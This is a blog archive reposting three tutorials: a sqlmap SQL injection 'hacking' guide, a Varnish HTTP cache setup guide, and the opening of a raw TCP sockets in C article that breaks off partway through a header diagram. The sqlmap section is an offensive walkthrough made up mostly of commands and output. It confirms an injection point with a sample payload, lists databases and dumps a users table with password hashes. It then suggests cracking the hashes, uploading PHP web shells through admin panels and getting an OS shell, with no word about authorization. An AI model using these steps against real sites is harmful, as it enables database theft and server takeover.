Thursday, July 18, 2013

Sqlmap tutorial for beginners |hacking with sql injection

http://www.binarytides.com/sqlmap-hacking-tutorial

Sqlmap is one of the most popular and powerful sql injection automation tool out there. Given a vulnerable http request url, sqlmap can exploit the remote database and do a lot of hacking like extracting database names, tables, columns, all the data in the tables etc. It can even read and write files on the remote file system under certain conditions. Written in python it is one of the most powerful hacking tools out there. Sqlmap is the metasploit of sql injections.

Sqlmap is included in pen testing linux distros like kali linux, 
backtrack, backbox etc. On other distros it can be simply downloaded 
from the following url
http://sqlmap.org/.
Since its written in python, first you have to install python on your system. On ubuntu install python from synaptic. On windows install activestate python. Check out this post for details on how to install and run sqlmap on windows.
For the list of options and parameters that can be used with the sqlmap command, check the sqlmap documentation at
https://github.com/sqlmapproject/sqlmap/wiki/Usage
In this tutorial we are going to learn how to use sqlmap to exploit a vulnerable web application and see what all can be done with such a tool.
To understand this tutorial you should have thorough knowledge of how database driven web applications work. For example those made with php+mysql.

Vulnerable Urls

Lets say there is a web application or website that has a url in it like this
http://www.site.com/section.php?id=51
and it is prone to sql injection because the developer of that site did not properly escape the parameter id. This can be simply tested by trying to open the url
http://www.site.com/section.php?id=51'
We just added a single quote in the parameter. If this url throws an error or reacts in an unexpected manner then it is clear that the database has got the unexpected single quote which the application did not escape properly. So in this case this input parameter "id" is vulnerable to sql injection.

Hacking with sqlmap

Now its time to move on to sqlmap to hack such urls. The sqlmap command is run from the terminal with the python interpreter.
python sqlmap.py -u "http://www.site.com/section.php?id=51"
The above is the first and most simple command to run with the sqlmap tool. It checks the input parameters to find if they are vulnerable to sql injection or not. For this sqlmap sends different kinds of sql injection payloads to the input parameter and checks the output. In the process sqlmap is also able to identify the remote system os, database name and version. Here is how the output might look like


[*] starting at 12:10:33

[12:10:33] [INFO] resuming back-end DBMS 'mysql' 
[12:10:34] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=51 AND (SELECT 1489 FROM(SELECT COUNT(*),CONCAT(0x3a73776c3a,(SELECT (CASE WHEN (1489=1489) THEN 1 ELSE 0 END)),0x3a7a76653a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---
[12:10:37] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD
web application technology: Apache 2.2.22
back-end DBMS: MySQL 5
So the sqlmap tool has discovered the operating system, web server and database along with version information. Even this much is pretty impressive. But its time to move on and see what more is this tool capable of.

Discover Databases

Once sqlmap confirms that a remote url is vulnerable to sql injection and is exploitable the next step is to find out the names of the databases that exist on the remote system. The "--dbs" option is used to get the database list.
$ python sqlmap.py -u "http://www.sitemap.com/section.php?id=51" --dbs
The output could be something like this
[*] starting at 12:12:56

[12:12:56] [INFO] resuming back-end DBMS 'mysql' 
[12:12:57] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=51 AND (SELECT 1489 FROM(SELECT COUNT(*),CONCAT(0x3a73776c3a,(SELECT (CASE WHEN (1489=1489) THEN 1 ELSE 0 END)),0x3a7a76653a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---
[12:13:00] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD
web application technology: Apache 2.2.22
back-end DBMS: MySQL 5
[12:13:00] [INFO] fetching database names
[12:13:00] [INFO] the SQL query used returns 2 entries
[12:13:00] [INFO] resumed: information_schema
[12:13:00] [INFO] resumed: safecosmetics
available databases [2]:
[*] information_schema
[*] safecosmetics
The output shows the existing databases on the remote system.

Find tables in a particular database

Now its time to find out what tables exist in a particular database. Lets say the database of interest over here is 'safecosmetics'
Command
$ python sqlmap.py -u "http://www.site.com/section.php?id=51" --tables -D safecosmetics
and the output can be something similar to this
[11:55:18] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD
web application technology: Apache 2.2.22
back-end DBMS: MySQL 5
[11:55:18] [INFO] fetching tables for database: 'safecosmetics'
[11:55:19] [INFO] heuristics detected web page charset 'ascii'
[11:55:19] [INFO] the SQL query used returns 216 entries
[11:55:20] [INFO] retrieved: acl_acl
[11:55:21] [INFO] retrieved: acl_acl_sections                                                                                
........... more tables
isnt this amazing ? it if ofcourse. Lets get the columns of a particular table now.

Get columns of a table

Now that we have the list of tables with us, it would be a good idea to get the columns of some important table. Lets say the table is 'users' and it contains the username and password.
$ python sqlmap.py -u "http://www.site.com/section.php?id=51" --columns -D safecosmetics -T users
The output can be something like this
[12:17:39] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD
web application technology: Apache 2.2.22
back-end DBMS: MySQL 5
[12:17:39] [INFO] fetching columns for table 'users' in database 'safecosmetics'
[12:17:41] [INFO] heuristics detected web page charset 'ascii'
[12:17:41] [INFO] the SQL query used returns 8 entries
[12:17:42] [INFO] retrieved: id
[12:17:43] [INFO] retrieved: int(11)                                                                                         
[12:17:45] [INFO] retrieved: name                                                                                            
[12:17:46] [INFO] retrieved: text                                                                                            
[12:17:47] [INFO] retrieved: password                                                                                        
[12:17:48] [INFO] retrieved: text                                                                                            

.......

[12:17:59] [INFO] retrieved: hash
[12:18:01] [INFO] retrieved: varchar(128)
Database: safecosmetics
Table: users
[8 columns]
+-------------------+--------------+
| Column            | Type         |
+-------------------+--------------+
| email             | text         |
| hash              | varchar(128) |
| id                | int(11)      |
| name              | text         |
| password          | text         |
| permission        | tinyint(4)   |
| system_allow_only | text         |
| system_home       | text         |
+-------------------+--------------+
So now the columns are clearly visible. Good job!

Get data from a table

Now comes the most interesting part, of extracting the data from the table. The command would be
$ python sqlmap.py -u "http://www.site.com/section.php?id=51" --dump -D safecosmetics -T users
The above command will simply dump the data of the particular table, very much like the mysqldump command.
The output might look similar to this
+----+--------------------+-----------+-----------+----------+------------+-------------+-------------------+
| id | hash               | name      | email     | password | permission | system_home | system_allow_only |
+----+--------------------+-----------+-----------+----------+------------+-------------+-------------------+
| 1  | 5DIpzzDHFOwnCvPonu | admin     |    |   | 3          |      |            |
+----+--------------------+-----------+-----------+----------+------------+-------------+-------------------+
The hash column seems to have the password hash. Try cracking the hash and then you would get the login details rightaway. sqlmap will create a csv file containing the dump data for easy analysis.
So far we have been able to collect a lot of information from the remote database using sqlmap. Its almost like having direct access to remote database through a client like phpmyadmin. In real scenarios hackers would try to gain a higher level to access to the system. For this, they would try to crack the password hashes and try to login through the admin panel. Or they would try to get an os shell using sqlmap.
I wrote another post on using sqlmap to get more details about remote databases. It explains the other options of sqlmap that are useful to find the out the database users, their privileges and their password hashes.

What Next ?

Execute arbitrary sql queries

This is probably the easiest thing to do on a server that is vulnerable to sql injection. The --sql-query parameter can be used to specify a sql query to execute. Things of interest would be to create a user in the users table or something similar. Or may be change/modify the content of cms pages etc.
Another paramter --sql-shell would give an sql shell like interface to run queries interactively.

Get inside the admin panel and play

If the website is running some kind of custom cms or something similar that has an admin panel, then it might be possible to get inside provided you are able to crack the password retrieved in the database dump. Simple and short length passwords can be broken simply by brute forcing or google.com.
Check if the admin panel allows to upload some files. If an arbitrary php file can be uploaded then it be a lot greater fun. The php file can contain shell_exec, system ,exec or passthru function calls and that will allow to execute arbitary system commands. Php web shell scripts can be uploaded to do the same thing.

Shell on remote OS

This is the thing to do to completely takeover the server. However note that it is not as easy and trivial as the tricks shown above. sqlmap comes with a parameter call --os-shell that can be used to try to get a shell on remote system, but it has many limitations of its own.
According to the sqlmap manual
It is possible to run arbitrary commands on the database server's underlying operating system when the back-end database management system is either MySQL, PostgreSQL or Microsoft SQL Server, and the session user has the needed privileges to abuse database specific functionalities and architectural weaknesses.
The most important privilege needed by the current database user is to write files through the database functions. This is absent in most cases. Hence this technique will not work in most cases.

Note

1. Sometimes sqlmap is unable to connect to the url at all. This is visible when it gets stuck at the first task of "testing connection to the target url". In such cases its helpful to use the "--random-agent" option. This makes sqlmap to use a valid user agent signature like the ones send by a browser like chrome or firefox.
2. For urls that are not in the form of param=value sqlmap cannot automatically know where to inject. For example mvc urls like http://www.site.com/class_name/method/43/80.
In such cases sqlmap needs to be told the injection point marked by a *
http://www.site.com/class_name/method/43*/80
The above will tell sqlmap to inject at the point marked by *
3. When using forms that submit data through post method then sqlmap has to be provided the post data in the "--data" options. For more information check out this tutorial on using sqlmap with forms.

Resources


1. http://www.slideshare.net/inquis/sql-injection-not-only-and-11-updated
2. http://www.slideshare.net/inquis/advanced-sql-injection-to-operating-system-full-control-whitepaper-4633857

Friday, June 28, 2013

Speed Up Your Web Site with Varnish

http://www.linuxjournal.com/content/speed-your-web-site-varnish


 Varnish is a program that can greatly speed up a Web site while reducing the load on the Web server. According to Varnish's official site, Varnish is a "Web application accelerator also known as a caching HTTP reverse proxy".
When you think about what a Web server does at a high level, it receives HTTP requests and returns HTTP responses. In a perfect world, the server would return a response immediately without having to do any real work. In the real world, however, the server may have to do quite a bit of work before returning a response to the client. Let's first look at how a typical Web server handles this, and then see what Varnish does to improve the situation.
Although every server is different, a typical Web server will go through a potentially long sequence of steps to service each request it receives. It may start by spawning a new process to handle the request. Then, it may have to load script files from disk, launch an interpreter process to interpret and compile those files into bytecode and then execute that bytecode. Executing the code may result in additional work, such as performing expensive database queries and retrieving more files from disk. Multiply this by hundreds or thousands of requests, and you can see how the server quickly can become overloaded, draining system resources trying to fulfill requests. To make matters worse, many of the requests are repeats of recent requests, but the server may not have a way to remember the responses, so it's sentenced to repeating the same painful process from the beginning for each request it encounters.
Things are a little different with Varnish in place. For starters, the request is received by Varnish instead of the Web server. Varnish then will look at what's being requested and forward the request to the Web server (known as a back end to Varnish). The back-end server does its regular work and returns a response to Varnish, which in turn gives the response to the client that sent the original request.
If that's all Varnish did, it wouldn't be much help. What gives us the performance gains is that Varnish can store responses from the back end in its cache for future use. Varnish quickly can serve the next response directly from its cache without placing any needless load on the back-end server. The result is that the load on the back end is reduced significantly, response times improve, and more requests can be served per second. One of the things that makes Varnish so fast is that it keeps its cache completely in memory instead of on disk. This and other optimizations allow Varnish to process requests at blinding speeds. However, because memory typically is more limited than disk, you have to size your Varnish cache properly and take measures not to cache duplicate objects that would waste valuable space.
Let's install Varnish. I'm going to explain how to install it from source, but you can install it using your distribution's package manager. The latest version of Varnish is 3.0.3, and that's the version I work with here. Be aware that the 2.x versions of Varnish have some subtle differences in the configuration syntax that could trip you up. Take a look at the Varnish upgrade page on the Web site for a full list of the changes between versions 2.x and 3.x.
Missing dependencies is one of the most common installation problems. Check the Varnish installation page for the full list of build dependencies.
Run the following commands as root to download and install the latest version of Varnish:

cd /var/tmp
wget http://repo.varnish-cache.org/source/varnish-3.0.3.tar.gz
tar xzf varnish-3.0.3.tar.gz
cd varnish-3.0.3
sh autogen.sh
sh configure
make
make test
make install

Varnish is now installed under the /usr/local directory. The full path to the main binary is /usr/local/sbin/varnishd, and the default configuration file is /usr/local/etc/varnish/default.vcl.
You can start Varnish by running the varnishd binary. Before you can do that though, you have to tell Varnish which back-end server it's caching for. Let's specify the back end in the default.vcl file. Edit the default.vcl file as shown below, substituting the values for those of your Web server:

backend default {
    .host = "127.0.0.1";
    .port = "80";
}

Now you can start Varnish with this command:

/usr/local/sbin/varnishd -f /usr/local/etc/varnish/default.vcl 
 ↪-a :6081 -P /var/run/varnish.pid -s malloc,256m

This will run varnishd as a dæmon and return you to the command prompt. One thing worth pointing out is that varnishd will launch two processes. The first is the manager process, and the second is the child worker process. If the child process dies for whatever reason, the manager process will spawn a new process.

Varnishd Startup Options

The -f option tells Varnish where your configuration file lives.
The -a option is the address:port that Varnish will listen on for incoming HTTP requests from clients.
The -P option is the path to the PID file, which will make it easier to stop Varnish in a few moments.
The -s option configures where the cache is kept. In this case, we're using a 256MB memory-resident cache.
If you installed Varnish from your package manager, it may be running already. In that case, you can stop it first, then use the command above to start it manually. Otherwise, the options it was started with may differ from those in this example. A quick way to see if Varnish is running and what options it was given is with the pgrep command:

/usr/bin/pgrep -lf varnish

Varnish now will relay any requests it receives to the back end you specified, possibly cache the response, and deliver the response back to the client. Let's submit some simple GET requests and see what Varnish does. First, run these two commands on separate terminals:

/usr/local/bin/varnishlog
/usr/local/bin/varnishstat

The following GET command is part of the Perl www library (libwww-perl). I use it so you can see the response headers you get back from Varnish. If you don't have libwww-perl, you could use Firefox with the Live HTTP Headers extension or another tool of your choice:

GET -Used http://localhost:6081/

Figure 1. Varnish Response Headers

 The options given to the GET command aren't important here. The important thing is that the URL points to the port on which varnishd is listening. There are three response headers that were added by Varnish. They are X-Varnish, Via and Age. These headers are useful once you know what they are. The X-Varnish header will be followed by either one or two numbers. The single-number version means the response was not in Varnish's cache (miss), and the number shown is the ID Varnish assigned to the request. If two numbers are shown, it means Varnish found a response in its cache (hit). The first is the ID of the request, and the second is the ID of the request from which the cached response was populated. The Via header just shows that the request went through a proxy. The Age header tells you how long the response has been cached by Varnish, in seconds. The first response will have an Age of 0, and subsequent hits will have an incrementing Age value. If subsequent responses to the same page don't increment the Age header, that means Varnish is not caching the response.
Now let's look at the varnishstat command launched earlier. You should see something similar to Figure 2.
Figure 2. varnishstat Command
The important lines are cache_hit and cache_miss. cache_hits won't be shown if you haven't had any hits yet. As more requests come in, the counters are updates to reflect hits and misses.
Next, let's look at the varnishlog command launched earlier (Figure 3).
Figure 3. varnishlog Command
This shows you fairly verbose details of the requests and responses that have gone through Varnish. The documentation on the Varnish Web site explains the log output as follows:
The first column is an arbitrary number, it defines the request. Lines with the same number are part of the same HTTP transaction. The second column is the tag of the log message. All log entries are tagged with a tag indicating what sort of activity is being logged. Tags starting with Rx indicate Varnish is receiving data and Tx indicates sending data. The third column tell us whether this is data coming or going to the client (c) or to/from the back end (b). The forth column is the data being logged.
varnishlog has various filtering options to help you find what you're looking for. I recommend playing around and getting comfortable with varnishlog, because it will really help you debug Varnish. Read the varnishlog(1) man page for all the details. Next are some simple examples of how to filter with varnishlog.
To view communication between Varnish and the client (omitting the back end):

/usr/local/bin/varnishlog -c

To view communication between Varnish and the back end (omitting the client):

/usr/local/bin/varnishlog -b

To view the headers received by Varnish (both the client's request headers and the back end's response headers):

/usr/local/bin/varnishlog -i RxHeader

Same thing, but limited to just the client's request headers:

/usr/local/bin/varnishlog -c -i RxHeader

Same thing, but limited to just the back end's response headers:

/usr/local/bin/varnishlog -b -i RxHeader

To write all log messages to the /var/log/varnish.log file and dæmonize:

/usr/local/bin/varnishlog -Dw /var/log/varnish.log

To read and display all log messages from the /var/log/varnish.log file:

/usr/local/bin/varnishlog -r /var/log/varnish.log

The last two examples demonstrate storing your Varnish log to disk. Varnish keeps a circular log in memory in order to stay fast, but that means old log entries are lost unless saved to disk. The last two examples above demonstrate how to save all log messages to a file for later review.
If you wanted to stop Varnish, you could do so with this command:

kill `cat /var/run/varnish.pid`

This will send the TERM signal to the process whose PID is stored in the /var/run/varnish.pid file. Because this is the varnishd manager process, Varnish will shut down.
Now that you know how to start and stop Varnish, and examine cache hits and misses, the natural question to ask is what does Varnish cache, and for how long?
Varnish is conservative with what it will cache by default, but you can change most of these defaults. It will consider only caching GET and HEAD requests. It won't cache a request with either a Cookie or Authorization header. It won't cache a response with either a Set-Cookie or Vary header. One thing Varnish looks at is the Cache-Control header. This header is optional, and it may be present in the Request or the Response. It may contain a list of one or more semicolon-separated directives. This header is meant to apply caching restrictions. However, Varnish won't alter its caching behavior based on the Cache-Control header, with the exception of the max-age directive. This directive looks like Cache-Control: max-age=n, where n is a number. If Varnish receives the max-age directive in the back end's response, it will use that value to set the cached response's expiration (TTL), in seconds. Otherwise, Varnish will set the cached response's TTL expiration to the value of its default_ttl parameter, which defaults to 120 seconds.

Note:

Varnish has configuration parameters with sensible defaults. For example, the default_ttl parameter defaults to 120 seconds. Configuration parameters are fully explained in the varnishd(1) man page. You may want to change some of the default parameter values. One way to do that is to launch varnishd by using the -p option. This has the downside of having to stop and restart Varnish, which will flush the cache. A better way of changing parameters is by using what Varnish calls the management interface. The management interface is available only if varnishd was started with the -T option. It specifies on what port the management interface should listen. You can connect to the management interface with the varnishadm command. Once connected, you can query parameters and change their values without having to restart Varnish.
To learn more, read the man pages for varnishd, varnishadm and varnish-cli.
You'll likely want to change what Varnish caches and how long it's cached for—this is called your caching policy. You express your caching policy in the default.vcl file by writing VCL. VCL stands for Varnish Configuration Language, which is like a very simple scripting language specific to Varnish. VCL is fully explained in the vcl(7) man page, and I recommend reading it.
Before changing default.vcl, let's think about the process Varnish goes through to fulfill an HTTP request. I call this the request/response cycle, and it all starts when Varnish receives a request. Varnish will parse the HTTP request and store the details in an object known to Varnish simply as req. Now Varnish has a decision to make based entirely on the req object—should it check its cache for a match or just forward the request to the back end without caching the response? If it decides to bypass its cache, the only thing left to do is forward the request to the back end and then forward the response back to the client. However, if it decides to check its cache, things get more interesting. This is called a cache lookup, and the result will either be a hit or a miss. A hit means that Varnish has a response in its cache for the client. A miss means that Varnish doesn't have a cached response to send, so the only logical thing to do is send the request to the back end and then cache the response it gives before sending it back to the client.
Now that you have an idea of Varnish's request/response cycle, let's talk about how to implement your caching policy by changing the decisions Varnish makes in the process. Varnish has a set of subroutines that carry out the process described above. Each of these subroutines performs a different part of the process, and the return value from the subroutine is how you tell Varnish what to do next. In addition to setting the return values, you can inspect and make changes to various objects within the subroutines. These objects represent things like the request and the response. Each subroutine has a default behavior that can be seen in default.vcl. You can redefine these subroutines to get Varnish to behave how you want.

Varnish Subroutines

The Varnish subroutines have default definitions, which are shown in default.vcl. Just because you redefine one of these subroutines doesn't mean the default definition will not execute. In particular, if you redefine one of the subroutines but don't return a value, Varnish will proceed to execute the default subroutine. All the default Varnish subroutines return a value, so it makes sens that Varnish uses them as a fallback.
The first subroutine to look at is called vcl_recv. This gets executed after receiving the full client request, which is available in the req object. Here you can inspect and make changes to the original request via the req object. You can use the value of req to decide how to proceed. The return value is how you tell Varnish what to do. I'll put the return values in parentheses as they are explained. Here you can tell Varnish to bypass the cache and send the back end's response back to the client (pass). You also can tell Varnish to check its cache for a match (lookup).
Next is the vcl_pass subroutine. If you returned pass in vcl_recv, this is where you'll be just before sending the request to the back end. You can tell Varnish to continue as planned (pass) or to restart the cycle at the vcl_recv subroutine (restart).
The vcl_miss and vcl_hit subroutines are executed depending on whether Varnish found a suitable response in the cache. From vcl_miss, your main options are to get a response from the back-end server and cache it (fetch) or to get a response from the back end and not cache it (pass). vcl_hit is where you'll be if Varnish successfully finds a matching response in its cache. From vcl_hit, you have the cached response available to you in the obj object. You can tell Varnish to send the cached response to the client (deliver) or have Varnish ignore the cached response and return a fresh response from the back end (pass).
The vcl_fetch subroutine is where you'll be after getting a fresh response from the back end. The response will be available to you in the beresp object. You either can tell Varnish to continue as planned (deliver) or to start over (restart).
From vcl_deliver, you can finish the request/response cycle by delivering the response to the client and possibly caching it as well (deliver), or you can start over (restart).
As previously stated, you express your caching policy within the subroutines in default.vcl. The return values tell Varnish what to do next. You can base your return values on many things, including the values held in the request (req) and response (resp) objects mentioned earlier. In addition to req and resp, there also is a client object representing the client, a server object and a beresp object representing the back end's response. It's important to realize that not all objects are available in all subroutines. It's also important to return one of the allowed return values from subroutines. One of the hardest things to remember when starting out with Varnish is which objects are available in which subroutines, and what the legal return values are. To make it easier, I've created a couple reference tables. They will help you get up to speed quickly by not having to memorize everything up front or dig through the documentation every time you make a change.

Table 1. This table shows which objects are available in each of the subroutines.

client server req bereq beresp resp obj
vcl_recv X X X
vcl_pass X X X X
vcl_miss X X X X
vcl_hit X X X X
vcl_fetch X X X X X
vcl_deliver X X X X

Table 2. This table shows valid return values for each of the subroutines.

pass lookup error restart deliver fetch pipe hit_for_pass
vcl_recv X X X X
vcl_pass X X X
vcl_lookup
vcl_miss X X X
vcl_hit X X X X
vcl_fetch X X X X
vcl_deliver X X X

Tip:

Be sure to read the full explanation of VCL, available subroutines, return values and objects in the vcl(7) man page.
Let's put it all together by looking at some examples.
Normalizing the request's Host header:

sub vcl_recv {
    if (req.http.host ~ "^www.example.com") {
        set req.http.host = "example.com";
    }
}

Notice you access the request's host header by using req.http.host. You have full access to all of the request's headers by putting the header name after req.http. The ~ operator is the match operator. That is followed by a regular expression. If you match, you then use the set keyword and the assignment operator (=) to normalize the hostname to simply "example.com". A really good reason to normalize the hostname is to keep Varnish from caching duplicate responses. Varnish looks at the hostname and the URL to determine if there's a match, so the hostnames should be normalized if possible.
Here's a snippet from the default vcl_recv subroutine:

sub vcl_recv {
    if (req.request != "GET" && req.request != "HEAD") {
        return (pass);
    }
    return (lookup);
}

That's a snippet of the default vcl_recv subroutine. You can see that if it's not a GET or HEAD request, varnish returns pass and won't cache the response. If it is a GET or HEAD request, it looks it up in the cache.
Removing request's Cookies if the URL matches:

sub vcl_recv {
    if (req.url ~ "^/images") {
        unset req.http.cookie;
    }
}

That's an example from the Varnish Web site. It removes cookies from the request if the URL starts with "/images". This makes sense when you recall that Varnish won't cache a request with a cookie. By removing the cookie, you allow Varnish to cache the response.
Removing response cookies for image files:

sub vcl_fetch {
    if (req.url ~ "\.(png|gif|jpg)$") {
        unset beresp.http.set-cookie;
        set beresp.ttl = 1h;
    }
} 

That's another example from Varnish's Web site. Here you're in the vcl_fetch subroutine, which happens after fetching a fresh response from the back end. Recall that the response is held in the beresp object. Notice that here you're accessing both the request (req) and the response (beresp). If the request is for an image, you remove the Set-Cookie header set by the server and override the cached response's TTL to one hour. Again, you do this because Varnish won't cache responses with the Set-Cookie header.

 Now, let's say you want to add a header to the response called X-Hit. The value should be 1 for a cache hit and 0 for a miss. The easiest way to detect a hit is from within the vcl_hit subroutine. Recall that vcl_hit will be executed only when a cache hit occurs. Ideally, you'd set the response header from within vcl_hit, but looking at Table 1 in this article, you see that neither of the response objects (beresp and resp) are available within vcl_hit. One way around this is to set a temporary header in the request, then later set the response header. Let's take a look at how to solve this.
Adding an X-Hit response header:

sub vcl_hit {
    set req.http.tempheader = "1";
}

sub vcl_miss {
    set req.http.tempheader = "0";
}

sub vcl_deliver {
    set resp.http.X-Hit = "0";
    if (req.http.tempheader) {
        set resp.http.X-Hit = req.http.tempheader;
        unset req.http.tempheader;
    }
}

The code in vcl_hit and vcl_miss is straightforward—set a value in a temporary request header to indicate a cache hit or miss. The interesting bit is in vcl_deliver. First, I set a default value for X-Hit to 0, indicating a miss. Next, I detect whether the request's tempheader was set, and if so, set the response's X-Hit header to match the temporary header set earlier. I then delete the tempheader to keep things tidy, and I'm all done. The reason I chose the vcl_deliver subroutine is because the response object that will be sent back to the client (resp) is available only within vcl_deliver.
Let's explore a similar solution that doesn't work as expected.
Adding an X-Hit response header—the wrong way:

sub vcl_hit {
    set req.http.tempheader = "1";
}

sub vcl_miss {
    set req.http.tempheader = "0";
}

sub vcl_fetch {
    set beresp.http.X-Hit = "0";
    if (req.http.tempheader) {
        set beresp.http.X-Hit = req.http.tempheader;
        unset req.http.tempheader;
    }
}

Notice that within vcl_fetch, I'm now altering the back end's response (beresp), not the final response sent to the client. This code appears to work as expected, but it has a major bug. What happens is that the first request is a miss and fetched from the back end, and that response has X-Hit set to "0" then it's cached. Subsequent requests result in a cache hit and never enter the vcl_fetch subroutine. The result is that all cache hits continue having X-Hit set to "0". These are the types of mistakes to look out for when working with Varnish.
The easiest way to avoid these mistakes is to keep those reference tables handy; remember when each subroutine is executed in Varnish's workflow, and always test the results.
Let's look at a simple way to tell Varnish to cache everything for one hour. This is shown only as an example and isn't recommended for a real server.
Cache all responses for one hour:

sub vcl_recv {
    return (lookup);
}

sub vcl_fetch {
    set beresp.ttl = 1h;
    return (deliver);
}

Here, I'm overriding two default subroutines with my own. If I hadn't returned "deliver" from vcl_fetch, Varnish still would have executed its default vcl_fetch subroutine looking for a return value, and this would not have worked as expected.
Once you get Varnish to implement your caching policy, you should run some benchmarks to see if there is any improvement. The benchmarking tool I use here is the Apache benchmark tool, known as ab. You can install this tool as part of the Apache Web server or as a separate package—depending on your system's package manager. You can read about the various options available to ab in either the man page or at the Apache Web site.
In the benchmark examples below, I have a stock Apache 2.2 installation listening on port 80, and Varnish listening on port 6081. The page I'm testing is a very basic Perl CGI script I wrote that just outputs a one-liner HTML page. It's important to benchmark the same URL against both the Web server and Varnish so you can make a direct comparison. I run the benchmark from the same machine that Apache and Varnish are running on in order to eliminate the network as a factor. The ab options I use are fairly straightforward. Feel free to experiment with different ab options and see what happens.
Let's start with 1000 total requests (-n 1000) and a concurrency of 1 (-c 1).
Benchmarking Apache with ab:

ab -c 1 -n 1000 http://localhost/cgi-bin/test

Figure 4. Output from ab Command (Apache)
Benchmarking Varnish with ab:

ab -c 1 -n 1000 http://localhost:6081/cgi-bin/test

Figure 5. Output from ab Command (Varnish)
As you can see, the ab command provides a lot of useful output. The metrics I'm looking at here are "Time per request" and "Requests per second" (rps). You can see that Apache came in at just over 1ms per request (780 rps), while Varnish came in at 0.1ms (7336 rps)—nearly ten times faster than Apache. This shows that Varnish is faster, at least based on the current setup and isolated testing. It's a good idea to run ab with various options to get a feel for performance—particularly by changing the concurrency values and seeing what impact that has on your system.

System Load and %iowait

System load is a measure of how much load is being placed on your CPU(s). As a general rule, you want the number to stay below 1.0 per CPU or core on your system. That means if you have a four-core system as in the machine I'm benchmarking here, you want your system's load to stay below 4.0.
%iowait is a measure of the percentage of CPU time spent waiting on input/output. A high %iowait indicates your system is disk-bound, performing many disk i/o operations causing the system to slow down. For example, if your server had to retrieve 100 files or more for each request, it likely would cause the %iowait time to go up very high indicating that the disk is a bottleneck.
The goal is to not only improve response times, but also to do so with as little impact on system resources as possible. Let's compare how a prolonged traffic surge affects system resources. Two good measures of system performance are the load average and the %iowait. The load average can be seen with the top utility, and the %iowait can be seen with the iostat command. You're going to want to keep an eye on both top and iostat during the prolonged load test to see how the numbers change. Let's fire up top and iostat, each on separate terminals.
Starting iostat with a two-second update interval:

iostat -c 2

Starting top:

/usr/bin/top

Now you're ready to run the benchmark. You want ab to run long enough to see the impact on system performance. This typically means anywhere from one minute to ten minutes. Let's re-run ab with a lot more total requests and a higher concurrency.
Load testing Apache with ab:

ab -c 50 -n 100000 http://localhost/cgi-bin/test

Figure 6. System Load Impact of Traffic Surge on Apache
Load testing Varnish with ab:

ab -c 50 -n 1000000 http://localhost:6081/cgi-bin/test

Figure 7. System Load Impact of Traffic Surge on Varnish
First let's compare response times. Although you can't see it in the screenshots, which were taken just before ab finished, Apache came in at 23ms per request (2097 rps), and Varnish clocked in at 4ms per request (12099 rps). The most drastic difference can be seen in the load averages in top. While Apache brought the system load all the way up to 12, Varnish kept the system load near 0 at 0.4. I did have to wait several minutes for the machine's load averages to go back down after the Apache load test before load testing Varnish. It's also best to run these tests on a non-production system that is mostly idle.
Although everyone's servers and Web sites have different requirements and configurations, Varnish may be able to improve your site's performance drastically while simultaneously reducing the load on the server.

Thursday, June 27, 2013

Code raw sockets in C on Linux

http://www.binarytides.com/raw-sockets-c-code-linux


Raw tcp sockets in C

Raw sockets can be used to construct a packet manually inside an application. In normal sockets when any data is send over the network, the kernel of the operating system adds some headers to it like IP header and TCP header. So an application only needs to take care of what data it is sending and what reply it is expecting.


But there are other cases when an application needs to set its own headers. Raw sockets are used in security related applications like nmap , packets sniffer etc. In this article we are going to program raw sockets on linux using native sockets. Windows for example does not support raw socket programming directly. To program raw sockets on windows a packet crafting library like winpcap has to be used.
In this article we are going to do some raw socket programming by constructing a raw TCP packet and sending it over the network. Before programming raw sockets, it is recommended that you learn about the basics of socket programming in c.

Raw TCP packets

A TCP packet is constructed like this
Packet = IP Header + TCP Header + Data
The plus means to attach the binary data side by side. So when making a raw tcp packet we need to know how to construct the headers properly. The structures of all headers are established standards which are described in RFCs.

Ip header

The structure of IP Header as given by RFC 791
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
0                   1                   2                   3
0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|Version|  IHL  |Type of Service|          Total Length         |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|         Identification        |Flags|      Fragment Offset    |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|  Time to Live |    Protocol   |         Header Checksum       |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|                       Source Address                          |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|                    Destination Address                        |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|                    Options                    |    Padding    |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
The "Source Address" field stores the ip address of the system sending the packet and the "Destination Address" contains the ip address of the destination system. Ip addresses are stored in long number format. The "Protocol" field stores a number that indicates the protocol, which is TCP in this case.


Structure of tcp header

The structure of a TCP header as given by RFC 793
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
0                   1                   2                   3
0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
